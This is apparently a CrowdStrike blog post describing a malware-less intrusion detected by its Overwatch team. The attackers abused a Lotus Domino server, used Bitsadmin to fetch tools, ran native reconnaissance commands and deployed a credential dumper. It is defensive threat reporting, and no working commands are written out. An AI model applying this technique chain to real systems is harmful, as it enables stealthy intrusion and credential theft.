When we tell customers that malware is just a minor part of the overall security breach problem, they often ask what a malware-less attack looks like, and if they really happen. Here is an example recently detected by us here at Falcon Overwatch.
The adversary took advantage of a public-facing Lotus Domino server in the customer’s environment to gain a foothold on two hosts without the use of malware. The attackers then used the native Bitsadmin, a tool that is developed by Microsoft and is part of the Windows Operating System, to download NBTScan onto those systems. NBTScan is a network scanner commonly used by pen testers to do reconnaissance. It is important to stress that the Adversary used an existing, legitimate program to download another common networking tool, available for download from legitimate web sites. At this point, they had still neither deployed nor leveraged a single piece of malware, nor had they relied on any malicious compromised web sites. As a result, they successfully stayed under the radar of security products looking for static, atomic indicators, malicious binaries or common exploits.
With their beachhead established, the adversary then started to probe our customer’s environment by using commands that are part of the compromised host’s operating system such as net user, whoami, ipconfig, netstat and quser (among others). The results of this reconnaissance were piped into text files in the public facing Lotus Domino folders on the compromised hosts, allowing the actor to easily access them. When looked at individually, all of those actions are perfectly legitimate or administrative.
When their reconnaissance was done, the Adversary used Bitsadmin once more, but this time, to bring down a heavier tool. The tool deployed by the adversary was not a common or publicly available tool. Our Intelligence team found that the tool had extensive overlaps with Mimikatz, PWDumpX and Windows Credential Editor, three commonly used password dumping tools. This real-time intelligence allowed us in Overwatch to recognize in a timely manner that the attackers were imminently going to attempt to steal credentials. Furthermore, having a good understanding of the tool’s parameters and functionality, in conjunction with alerts generated by the Falcon sensor, allowed us to see exactly what they were doing.
Falcon Overwatch provides near real-time close support to customers to detect and prevent all intrusions, even when no malware is present. Using our hunting patterns and discovery methods, we were able to identify the attack before any known malware was deployed, and subsequently, augment the real-time alerting from the Falcon sensor. The customer knew the attack vector, and what hosts and accounts were compromised before the adversary could leverage them to steal company intellectual property.
At CrowdStrike, our goal is to provide customers with timely, actionable alerts and intelligence to mitigate the impact of serious breaches by hands-on adversaries. Proactive hunting, combined with real-time endpoint detection and response (EDR) allows us to solve one of the most difficult problems in the security industry — silent failure.